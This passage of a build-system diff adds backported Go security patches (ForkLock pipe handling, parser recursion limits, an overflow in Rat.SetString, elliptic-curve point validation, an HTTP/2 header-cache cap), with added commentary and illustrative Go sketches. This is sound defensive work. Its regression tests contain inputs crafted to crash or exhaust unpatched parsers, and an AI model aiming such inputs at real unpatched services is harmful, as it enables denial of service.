++golang.org/x/net v0.0.0-20211209100217-a5309b321dca h1:UmeWAm8AwB6NA/e4FSaGlK1EKTLXKX3utx4Si+6kfPg=
++golang.org/x/net v0.0.0-20211209100217-a5309b321dca/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+ golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+ golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+ golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf h1:+4j7oujXP478CVb/AFvHJmVX5+Pczx2NGts5yirA0oY=
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 702fd5a..83f2a72 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4293,7 +4293,15 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.canonHeader = make(map[string]string)
+ }
+ cv = CanonicalHeaderKey(v)
+- sc.canonHeader[v] = cv
++ // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
++ // entries in the canonHeader cache. This should be larger than the number
++ // of unique, uncommon header keys likely to be sent by the peer, while not
++ // so high as to permit unreasonable memory usage if the peer sends an unbounded
++ // number of unique header keys.
++ const maxCachedCanonicalHeaders = 32
++ if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++ sc.canonHeader[v] = cv
++ }
+ return cv
+ }
+
+diff --git a/src/vendor/modules.txt b/src/vendor/modules.txt
+index 669bd9b..1d67183 100644
+--- a/src/vendor/modules.txt
++++ b/src/vendor/modules.txt
+@@ -8,7 +8,7 @@ golang.org/x/crypto/curve25519
+ golang.org/x/crypto/hkdf
+ golang.org/x/crypto/internal/subtle
+ golang.org/x/crypto/poly1305
+-# golang.org/x/net v0.0.0-20210129194117-4acb7895a057
++# golang.org/x/net v0.0.0-20211209100217-a5309b321dca
+ ## explicit
+ golang.org/x/net/dns/dnsmessage
+ golang.org/x/net/http/httpguts
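
The backport above bounds the HTTP/2 server's canonical-header cache so that a peer sending endless unique header keys can no longer grow server memory without limit. The standalone Go sketch below shows the same cap-the-memoization pattern; the type and field names are illustrative assumptions, not the identifiers used in h2_bundle.go.

package main

import (
    "fmt"
    "net/textproto"
)

// cappedCanonCache memoizes canonical header keys but refuses to grow past
// maxEntries. The type and field names are illustrative, not the ones used
// in h2_bundle.go.
type cappedCanonCache struct {
    entries    map[string]string
    maxEntries int
}

func (c *cappedCanonCache) canonical(v string) string {
    if cv, ok := c.entries[v]; ok {
        return cv
    }
    cv := textproto.CanonicalMIMEHeaderKey(v)
    if c.entries == nil {
        c.entries = make(map[string]string)
    }
    // Cache only while under the cap; past it we still return the right
    // value, we just stop spending memory to remember it.
    if len(c.entries) < c.maxEntries {
        c.entries[v] = cv
    }
    return cv
}

func main() {
    c := &cappedCanonCache{maxEntries: 2}
    for _, k := range []string{"x-one", "x-two", "x-three"} {
        fmt.Println(c.canonical(k), "cached:", len(c.entries))
    }
}
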
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
new file mode 100644
index 0000000000..17cac7a5ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
@@ -0,0 +1,83 @@
+From 9171c664e7af479aa26bc72f2e7cf4e69d8e0a6f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 10:22:47 +0530
+Subject: [PATCH] CVE-2021-44717
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/44a3fb49]
+CVE: CVE-2021-44717
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+syscall: fix ForkLock spurious close(0) on pipe failure
+Pipe (and therefore forkLockPipe) does not make any guarantees
+about the state of p after a failed Pipe(p). Avoid that assumption
+and the too-clever goto, so that we don't accidentally Close a real fd
+if the failed pipe leaves p[0] or p[1] set >= 0.
+
+Updates #50057
+Fixes CVE-2021-44717
+
+Change-Id: Iff8e19a6efbba0c73cc8b13ecfae381c87600bb4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1291270
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/370514
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Alex Rakoczy <alex@golang.org>
+---
+ src/syscall/exec_unix.go | 20 ++++++--------------
+ 1 file changed, 6 insertions(+), 14 deletions(-)
+
+diff --git a/src/syscall/exec_unix.go b/src/syscall/exec_unix.go
+index b3798b6..b73782c 100644
+--- a/src/syscall/exec_unix.go
++++ b/src/syscall/exec_unix.go
+@@ -151,9 +151,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+ sys = &zeroSysProcAttr
+ }
+
+- p[0] = -1
+- p[1] = -1
+-
+ // Convert args to C form.
+ argv0p, err := BytePtrFromString(argv0)
+ if err != nil {
+@@ -194,14 +191,17 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+
+ // Allocate child status pipe close on exec.
+ if err = forkExecPipe(p[:]); err != nil {
+- goto error
++ ForkLock.Unlock()
++ return 0, err
+ }
+
+ // Kick off child.
+ pid, err1 = forkAndExecInChild(argv0p, argvp, envvp, chroot, dir, attr, sys, p[1])
+ if err1 != 0 {
+- err = Errno(err1)
+- goto error
++ Close(p[0])
++ Close(p[1])
++ ForkLock.Unlock()
++ return 0, Errno(err1)
+ }
+ ForkLock.Unlock()
+
+@@ -228,14 +228,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
+
+ // Read got EOF, so pipe closed on exec, so exec succeeded.
+ return pid, nil
+-
+-error:
+- if p[0] >= 0 {
+- Close(p[0])
+- Close(p[1])
+- }
+- ForkLock.Unlock()
+- return 0, err
+ }
+
+ // Combination of fork and exec, careful to be thread safe.
+--
+2.25.1
+
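
The fix above replaces a shared goto-based cleanup with early returns, so a failed Pipe can never cause an unrelated file descriptor (historically fd 0) to be closed. Below is a minimal Unix-only sketch of that rule, using a hypothetical setupStatusPipe helper rather than the syscall package's forkExec: never Close descriptors whose values came from a call that failed.

package main

import (
    "fmt"
    "syscall"
)

// setupStatusPipe creates a pipe and hands back both ends. If Pipe fails we
// return immediately and never look at p again: a failed Pipe makes no
// promises about what it left in the array, so closing p[0]/p[1] here could
// close a descriptor this function never opened. Illustrative sketch only.
func setupStatusPipe() (int, int, error) {
    var p [2]int
    if err := syscall.Pipe(p[:]); err != nil {
        return -1, -1, err
    }
    return p[0], p[1], nil
}

func main() {
    r, w, err := setupStatusPipe()
    if err != nil {
        fmt.Println("pipe failed:", err)
        return
    }
    fmt.Println("pipe fds:", r, w)
    syscall.Close(r)
    syscall.Close(w)
}
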
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
new file mode 100644
index 0000000000..b2ab5d0669
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
@@ -0,0 +1,357 @@
+From ba8788ebcead55e99e631c6a1157ad7b35535d11 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 15 Jun 2022 10:43:05 -0700
+Subject: [PATCH] [release-branch.go1.17] go/parser: limit recursion depth
+
+Limit nested parsing to 100,000, which prevents stack exhaustion when
+parsing deeply nested statements, types, and expressions. Also limit
+the scope depth to 1,000 during object resolution.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #53707
+Updates #53616
+Fixes CVE-2022-1962
+
+Change-Id: I4d7b86c1d75d0bf3c7af1fdea91582aa74272c64
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1491025
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 6a856f08d58e4b6705c0c337d461c540c1235c83)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/417070
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ba8788ebcead55e99e631c6a1157ad7b35535d11]
+CVE: CVE-2022-1962
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/interface.go | 10 ++-
+ src/go/parser/parser.go | 48 ++++++++--
+ src/go/parser/parser_test.go | 169 +++++++++++++++++++++++++++++++++++
+ 3 files changed, 220 insertions(+), 7 deletions(-)
+
+diff --git a/src/go/parser/interface.go b/src/go/parser/interface.go
+index 54f9d7b..537b327 100644
+--- a/src/go/parser/interface.go
++++ b/src/go/parser/interface.go
+@@ -92,8 +92,11 @@ func ParseFile(fset *token.FileSet, filename string, src interface{}, mode Mode)
+ defer func() {
+ if e := recover(); e != nil {
+ // resume same panic if it's not a bailout
+- if _, ok := e.(bailout); !ok {
++ bail, ok := e.(bailout)
++ if !ok {
+ panic(e)
++ } else if bail.msg != "" {
++ p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ }
+ }
+
+@@ -188,8 +191,11 @@ func ParseExprFrom(fset *token.FileSet, filename string, src interface{}, mode M
+ defer func() {
+ if e := recover(); e != nil {
+ // resume same panic if it's not a bailout
+- if _, ok := e.(bailout); !ok {
++ bail, ok := e.(bailout)
++ if !ok {
+ panic(e)
++ } else if bail.msg != "" {
++ p.errors.Add(p.file.Position(bail.pos), bail.msg)
+ }
+ }
+ p.errors.Sort()
+diff --git a/src/go/parser/parser.go b/src/go/parser/parser.go
+index 31a7398..586fe90 100644
+--- a/src/go/parser/parser.go
++++ b/src/go/parser/parser.go
+@@ -64,6 +64,10 @@ type parser struct {
+ unresolved []*ast.Ident // unresolved identifiers
+ imports []*ast.ImportSpec // list of imports
+
++ // nestLev is used to track and limit the recursion depth
++ // during parsing.
++ nestLev int
++
+ // Label scopes
+ // (maintained by open/close LabelScope)
+ labelScope *ast.Scope // label scope for current function
+@@ -236,6 +240,24 @@ func un(p *parser) {
+ p.printTrace(")")
+ }
+
++// maxNestLev is the deepest we're willing to recurse during parsing
++const maxNestLev int = 1e5
++
++func incNestLev(p *parser) *parser {
++ p.nestLev++
++ if p.nestLev > maxNestLev {
++ p.error(p.pos, "exceeded max nesting depth")
++ panic(bailout{})
++ }
++ return p
++}
++
++// decNestLev is used to track nesting depth during parsing to prevent stack exhaustion.
++// It is used along with incNestLev in a similar fashion to how un and trace are used.
++func decNestLev(p *parser) {
++ p.nestLev--
++}
++
+ // Advance to the next token.
+ func (p *parser) next0() {
+ // Because of one-token look-ahead, print the previous token
+@@ -348,8 +370,12 @@ func (p *parser) next() {
+ }
+ }
+
+-// A bailout panic is raised to indicate early termination.
+-type bailout struct{}
++// A bailout panic is raised to indicate early termination. pos and msg are
++// only populated when bailing out of object resolution.
++type bailout struct {
++ pos token.Pos
++ msg string
++}
+
+ func (p *parser) error(pos token.Pos, msg string) {
+ epos := p.file.Position(pos)
+@@ -1030,6 +1056,8 @@ func (p *parser) parseChanType() *ast.ChanType {
+
+ // If the result is an identifier, it is not resolved.
+ func (p *parser) tryIdentOrType() ast.Expr {
++ defer decNestLev(incNestLev(p))
++
+ switch p.tok {
+ case token.IDENT:
+ return p.parseTypeName()
+@@ -1609,7 +1637,13 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ }
+
+ x := p.parseUnaryExpr(lhs)
+- for {
++ // We track the nesting here rather than at the entry for the function,
++ // since it can iteratively produce a nested output, and we want to
++ // limit how deep a structure we generate.
++ var n int
++ defer func() { p.nestLev -= n }()
++ for n = 1; ; n++ {
++ incNestLev(p)
+ op, oprec := p.tokPrec()
+ if oprec < prec1 {
+ return x
+@@ -1628,7 +1662,7 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
+ // The result may be a type or even a raw type ([...]int). Callers must
+ // check the result (using checkExpr or checkExprOrType), depending on
+ // context.
+-func (p *parser) parseExpr(lhs bool) ast.Expr {
++func (p *parser) parseExpr(lhs bool) ast.Expr {
+ if p.trace {
+ defer un(trace(p, "Expression"))
+ }
+@@ -1899,6 +1933,8 @@ func (p *parser) parseIfHeader() (init ast.Stmt, cond ast.Expr) {
+ }
+
+ func (p *parser) parseIfStmt() *ast.IfStmt {
++ defer decNestLev(incNestLev(p))
++
+ if p.trace {
+ defer un(trace(p, "IfStmt"))
+ }
+@@ -2214,6 +2250,8 @@ func (p *parser) parseForStmt() ast.Stmt {
+ }
+
+ func (p *parser) parseStmt() (s ast.Stmt) {
++ defer decNestLev(incNestLev(p))
++
+ if p.trace {
+ defer un(trace(p, "Statement"))
+ }
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 25a374e..37a6a2b 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -10,6 +10,7 @@ import (
+ "go/ast"
+ "go/token"
+ "os"
++ "runtime"
+ "strings"
+ "testing"
+ )
+@@ -569,3 +570,171 @@ type x int // comment
+ t.Errorf("got %q, want %q", comment, "// comment")
+ }
+ }
++
++var parseDepthTests = []struct {
++ name string
++ format string
++ // multipler is used when a single statement may result in more than one
++ // change in the depth level, for instance "1+(..." produces a BinaryExpr
++ // followed by a UnaryExpr, which increments the depth twice. The test
++ // case comment explains which nodes are triggering the multiple depth
++ // changes.
++ parseMultiplier int
++ // scope is true if we should also test the statement for the resolver scope
++ // depth limit.
++ scope bool
++ // scopeMultiplier does the same as parseMultiplier, but for the scope
++ // depths.
++ scopeMultiplier int
++}{
++ // The format expands the part inside « » many times.
++ // A second set of brackets nested inside the first stops the repetition,
++ // so that for example «(«1»)» expands to (((...((((1))))...))).
++ {name: "array", format: "package main; var x «[1]»int"},
++ {name: "slice", format: "package main; var x «[]»int"},
++ {name: "struct", format: "package main; var x «struct { X «int» }»", scope: true},
++ {name: "pointer", format: "package main; var x «*»int"},
++ {name: "func", format: "package main; var x «func()»int", scope: true},
++ {name: "chan", format: "package main; var x «chan »int"},
++ {name: "chan2", format: "package main; var x «<-chan »int"},
++ {name: "interface", format: "package main; var x «interface { M() «int» }»", scope: true, scopeMultiplier: 2}, // Scopes: InterfaceType, FuncType
++ {name: "map", format: "package main; var x «map[int]»int"},
++ {name: "slicelit", format: "package main; var x = «[]any{«»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "arraylit", format: "package main; var x = «[1]any{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "structlit", format: "package main; var x = «struct{x any}{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
++ {name: "maplit", format: "package main; var x = «map[int]any{1:«nil»}»", parseMultiplier: 2}, // Parser nodes: CompositeLit, KeyValueExpr
++ {name: "dot", format: "package main; var x = «x.»x"},
++ {name: "index", format: "package main; var x = x«[1]»"},
++ {name: "slice", format: "package main; var x = x«[1:2]»"},
++ {name: "slice3", format: "package main; var x = x«[1:2:3]»"},
++ {name: "dottype", format: "package main; var x = x«.(any)»"},
++ {name: "callseq", format: "package main; var x = x«()»"},
++ {name: "methseq", format: "package main; var x = x«.m()»", parseMultiplier: 2}, // Parser nodes: SelectorExpr, CallExpr
++ {name: "binary", format: "package main; var x = «1+»1"},
++ {name: "binaryparen", format: "package main; var x = «1+(«1»)»", parseMultiplier: 2}, // Parser nodes: BinaryExpr, ParenExpr
++ {name: "unary", format: "package main; var x = «^»1"},
++ {name: "addr", format: "package main; var x = «& »x"},
++ {name: "star", format: "package main; var x = «*»x"},
++ {name: "recv", format: "package main; var x = «<-»x"},
++ {name: "call", format: "package main; var x = «f(«1»)»", parseMultiplier: 2}, // Parser nodes: Ident, CallExpr
++ {name: "conv", format: "package main; var x = «(*T)(«1»)»", parseMultiplier: 2}, // Parser nodes: ParenExpr, CallExpr
++ {name: "label", format: "package main; func main() { «Label:» }"},
++ {name: "if", format: "package main; func main() { «if true { «» }»}", parseMultiplier: 2, scope: true, scopeMultiplier: 2}, // Parser nodes: IfStmt, BlockStmt. Scopes: IfStmt, BlockStmt
++ {name: "ifelse", format: "package main; func main() { «if true {} else » {} }", scope: true},
++ {name: "switch", format: "package main; func main() { «switch { default: «» }»}", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
++ {name: "typeswitch", format: "package main; func main() { «switch x.(type) { default: «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
++ {name: "for0", format: "package main; func main() { «for { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "for1", format: "package main; func main() { «for x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "for3", format: "package main; func main() { «for f(); g(); h() { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
++ {name: "forrange0", format: "package main; func main() { «for range x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "forrange1", format: "package main; func main() { «for x = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "forrange2", format: "package main; func main() { «for x, y = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
++ {name: "go", format: "package main; func main() { «go func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: GoStmt, FuncLit
++ {name: "defer", format: "package main; func main() { «defer func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: DeferStmt, FuncLit
++ {name: "select", format: "package main; func main() { «select { default: «» }» }", scope: true},
++}
++
++// split splits pre«mid»post into pre, mid, post.
++// If the string does not have that form, split returns x, "", "".
++func split(x string) (pre, mid, post string) {
++ start, end := strings.Index(x, "«"), strings.LastIndex(x, "»")
++ if start < 0 || end < 0 {
++ return x, "", ""
++ }
++ return x[:start], x[start+len("«") : end], x[end+len("»"):]
++}
++
++func TestParseDepthLimit(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes call stack exhaustion on js/wasm")
++ }
++ for _, tt := range parseDepthTests {
++ for _, size := range []string{"small", "big"} {
++ t.Run(tt.name+"/"+size, func(t *testing.T) {
++ n := maxNestLev + 1
++ if tt.parseMultiplier > 0 {
++ n /= tt.parseMultiplier
++ }
++ if size == "small" {
++ // Decrease the number of statements by 10, in order to check
++ // that we do not fail when under the limit. 10 is used to
++ // provide some wiggle room for cases where the surrounding
++ // scaffolding syntax adds some noise to the depth that changes
++ // on a per testcase basis.
++ n -= 10
++ }
++
++ pre, mid, post := split(tt.format)
++ if strings.Contains(mid, "«") {
++ left, base, right := split(mid)
++ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++ } else {
++ mid = strings.Repeat(mid, n)
++ }
++ input := pre + mid + post
++
++ fset := token.NewFileSet()
++ _, err := ParseFile(fset, "", input, ParseComments|SkipObjectResolution)
++ if size == "small" {
++ if err != nil {
++ t.Errorf("ParseFile(...): %v (want success)", err)
++ }
++ } else {
++ expected := "exceeded max nesting depth"
++ if err == nil || !strings.HasSuffix(err.Error(), expected) {
++ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++ }
++ }
++ })
++ }
++ }
++}
++
++func TestScopeDepthLimit(t *testing.T) {
++ if runtime.GOARCH == "wasm" {
++ t.Skip("causes call stack exhaustion on js/wasm")
++ }
++ for _, tt := range parseDepthTests {
++ if !tt.scope {
++ continue
++ }
++ for _, size := range []string{"small", "big"} {
++ t.Run(tt.name+"/"+size, func(t *testing.T) {
++ n := maxScopeDepth + 1
++ if tt.scopeMultiplier > 0 {
++ n /= tt.scopeMultiplier
++ }
++ if size == "small" {
++ // Decrease the number of statements by 10, in order to check
++ // that we do not fail when under the limit. 10 is used to
++ // provide some wiggle room for cases where the surrounding
++ // scaffolding syntax adds some noise to the depth that changes
++ // on a per testcase basis.
++ n -= 10
++ }
++
++ pre, mid, post := split(tt.format)
++ if strings.Contains(mid, "«") {
++ left, base, right := split(mid)
++ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
++ } else {
++ mid = strings.Repeat(mid, n)
++ }
++ input := pre + mid + post
++
++ fset := token.NewFileSet()
++ _, err := ParseFile(fset, "", input, DeclarationErrors)
++ if size == "small" {
++ if err != nil {
++ t.Errorf("ParseFile(...): %v (want success)", err)
++ }
++ } else {
++ expected := "exceeded max scope depth during object resolution"
++ if err == nil || !strings.HasSuffix(err.Error(), expected) {
++ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
++ }
++ }
++ })
++ }
++ }
++}
+--
+2.30.2
+
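
The parser change above threads a nesting counter (incNestLev/decNestLev) through every recursive production so that pathological inputs fail with a clean error instead of exhausting the goroutine stack. The compact sketch below applies the same technique to a toy grammar of nested parentheses; the limit of 1000 matches the spirit of the patch, while the parser type and function names are invented for the example.

package main

import (
    "errors"
    "fmt"
    "strings"
)

// maxDepth mirrors the idea of maxNestLev in the patch: deep enough that no
// real program hits it, shallow enough that the stack survives. The parser
// below is a toy for nested parentheses, not go/parser.
const maxDepth = 1000

var errTooDeep = errors.New("exceeded max nesting depth")

type parser struct {
    input string
    pos   int
    depth int
}

// parseGroup parses a possibly nested "(...)" group, bumping the depth
// counter on entry and restoring it on exit, like incNestLev/decNestLev.
func (p *parser) parseGroup() error {
    p.depth++
    defer func() { p.depth-- }()
    if p.depth > maxDepth {
        return errTooDeep
    }
    if p.pos >= len(p.input) || p.input[p.pos] != '(' {
        return nil // empty production: the recursion bottoms out here
    }
    p.pos++ // consume '('
    if err := p.parseGroup(); err != nil {
        return err
    }
    if p.pos >= len(p.input) || p.input[p.pos] != ')' {
        return errors.New("missing ')'")
    }
    p.pos++ // consume ')'
    return nil
}

func main() {
    shallow := &parser{input: strings.Repeat("(", 10) + strings.Repeat(")", 10)}
    fmt.Println("shallow:", shallow.parseGroup())

    deep := &parser{input: strings.Repeat("(", 5000) + strings.Repeat(")", 5000)}
    fmt.Println("deep:   ", deep.parseGroup())
}
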
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
new file mode 100644
index 0000000000..f0daee3624
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
@@ -0,0 +1,50 @@
+From 70882eedccac803ddcf1c3215e0ae8fd59847e39 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Sat, 26 Feb 2022 20:03:38 +0000
+Subject: [PATCH] [release-branch.go1.16] math/big: prevent overflow in
+ (*Rat).SetString
+
+Credit to rsc@ for the original patch.
+
+Thanks to the OSS-Fuzz project for discovering this
+issue and to Emmanuel Odeke (@odeke_et) for reporting it.
+
+Updates #50699
+Fixes #50700
+Fixes CVE-2022-23772
+---
+ src/math/big/ratconv.go | 5 +++++
+ src/math/big/ratconv_test.go | 1 +
+ 2 files changed, 6 insertions(+)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index 941139e..e8cbdbe 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -168,6 +168,11 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ n := exp5
+ if n < 0 {
+ n = -n
++ if n < 0 {
++ // This can occur if -n overflows. -(-1 << 63) would become
++ // -1 << 63, which is still negative.
++ return nil, false
++ }
+ }
+ pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ if exp5 > 0 {
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index ba0d1ba..b820df4 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -104,6 +104,7 @@ var setStringTests = []StringTest{
+ {in: "4/3/"},
+ {in: "4/3."},
+ {in: "4/"},
++ {in: "13e-9223372036854775808"}, // CVE-2022-23772
+
+ // valid
+ {"0", "0", true},
+--
+2.17.1
+
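
The one guard added above protects against a two's-complement corner case: negating the most negative integer overflows and the result stays negative. The small sketch below, using a hypothetical absGuarded helper, demonstrates exactly the behaviour that extra "if n < 0" check catches.

package main

import (
    "fmt"
    "math"
)

// absGuarded is a hypothetical helper showing the corner case the patch
// guards against: for the most negative int64, n = -n overflows and the
// result is still negative, so a second sign check is required.
func absGuarded(n int64) (int64, bool) {
    if n < 0 {
        n = -n
        if n < 0 {
            // -(-1 << 63) cannot be represented in an int64; report failure
            // rather than carrying on with a bogus "absolute value".
            return 0, false
        }
    }
    return n, true
}

func main() {
    fmt.Println(absGuarded(-42))           // 42 true
    fmt.Println(absGuarded(math.MinInt64)) // 0 false: negation overflowed
}
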
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
new file mode 100644
index 0000000000..772acdcbf6
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
@@ -0,0 +1,142 @@
+From 5b376a209d1c61e10847e062d78c4b1aa90dff0c Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Sat, 26 Feb 2022 10:40:57 +0000
+Subject: [PATCH] crypto/elliptic: make IsOnCurve return false for invalid
+
+ field elements
+
+Updates #50974
+Fixes #50977
+Fixes CVE-2022-23806
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+
+---
+ src/crypto/elliptic/elliptic.go | 6 +++
+ src/crypto/elliptic/elliptic_test.go | 81 ++++++++++++++++++++++++++++
+ src/crypto/elliptic/p224.go | 6 +++
+ 3 files changed, 93 insertions(+)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cd..bd574a4 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -53,6 +53,12 @@ func (curve *CurveParams) Params() *CurveParams {
+ }
+
+ func (curve *CurveParams) IsOnCurve(x, y *big.Int) bool {
++
++ if x.Sign() < 0 || x.Cmp(curve.P) >= 0 ||
++ y.Sign() < 0 || y.Cmp(curve.P) >= 0 {
++ return false
++ }
++
+ // y² = x³ - 3x + b
+ y2 := new(big.Int).Mul(y, y)
+ y2.Mod(y2, curve.P)
+diff --git a/src/crypto/elliptic/elliptic_test.go b/src/crypto/elliptic/elliptic_test.go
+index 09c5483..b13a620 100644
+--- a/src/crypto/elliptic/elliptic_test.go
++++ b/src/crypto/elliptic/elliptic_test.go
+@@ -628,3 +628,84 @@ func TestUnmarshalToLargeCoordinates(t *testing.T) {
+ t.Errorf("Unmarshal accepts invalid Y coordinate")
+ }
+ }
++
++func testAllCurves(t *testing.T, f func(*testing.T, Curve)) {
++ tests := []struct {
++ name string
++ curve Curve
++ }{
++ {"P256", P256()},
++ {"P256/Params", P256().Params()},
++ {"P224", P224()},
++ {"P224/Params", P224().Params()},
++ {"P384", P384()},
++ {"P384/Params", P384().Params()},
++ {"P521", P521()},
++ {"P521/Params", P521().Params()},
++ }
++ if testing.Short() {
++ tests = tests[:1]
++ }
++ for _, test := range tests {
++ curve := test.curve
++ t.Run(test.name, func(t *testing.T) {
++ t.Parallel()
++ f(t, curve)
++ })
++ }
++}
++
++// TestInvalidCoordinates tests big.Int values that are not valid field elements
++// (negative or bigger than P). They are expected to return false from
++// IsOnCurve, all other behavior is undefined.
++func TestInvalidCoordinates(t *testing.T) {
++ testAllCurves(t, testInvalidCoordinates)
++}
++
++func testInvalidCoordinates(t *testing.T, curve Curve) {
++ checkIsOnCurveFalse := func(name string, x, y *big.Int) {
++ if curve.IsOnCurve(x, y) {
++ t.Errorf("IsOnCurve(%s) unexpectedly returned true", name)
++ }
++ }
++
++ p := curve.Params().P
++ _, x, y, _ := GenerateKey(curve, rand.Reader)
++ xx, yy := new(big.Int), new(big.Int)
++
++ // Check if the sign is getting dropped.
++ xx.Neg(x)
++ checkIsOnCurveFalse("-x, y", xx, y)
++ yy.Neg(y)
++ checkIsOnCurveFalse("x, -y", x, yy)
++
++ // Check if negative values are reduced modulo P.
++ xx.Sub(x, p)
++ checkIsOnCurveFalse("x-P, y", xx, y)
++ yy.Sub(y, p)
++ checkIsOnCurveFalse("x, y-P", x, yy)
++
++ // Check if positive values are reduced modulo P.
++ xx.Add(x, p)
++ checkIsOnCurveFalse("x+P, y", xx, y)
++ yy.Add(y, p)
++ checkIsOnCurveFalse("x, y+P", x, yy)
++
++ // Check if the overflow is dropped.
++ xx.Add(x, new(big.Int).Lsh(big.NewInt(1), 535))
++ checkIsOnCurveFalse("x+2⁵³⁵, y", xx, y)
++ yy.Add(y, new(big.Int).Lsh(big.NewInt(1), 535))
++ checkIsOnCurveFalse("x, y+2⁵³⁵", x, yy)
++
++ // Check if P is treated like zero (if possible).
++ // y^2 = x^3 - 3x + B
++ // y = mod_sqrt(x^3 - 3x + B)
++ // y = mod_sqrt(B) if x = 0
++ // If there is no modsqrt, there is no point with x = 0, can't test x = P.
++ if yy := new(big.Int).ModSqrt(curve.Params().B, p); yy != nil {
++ if !curve.IsOnCurve(big.NewInt(0), yy) {
++ t.Fatal("(0, mod_sqrt(B)) is not on the curve?")
++ }
++ checkIsOnCurveFalse("P, y", p, yy)
++ }
++}
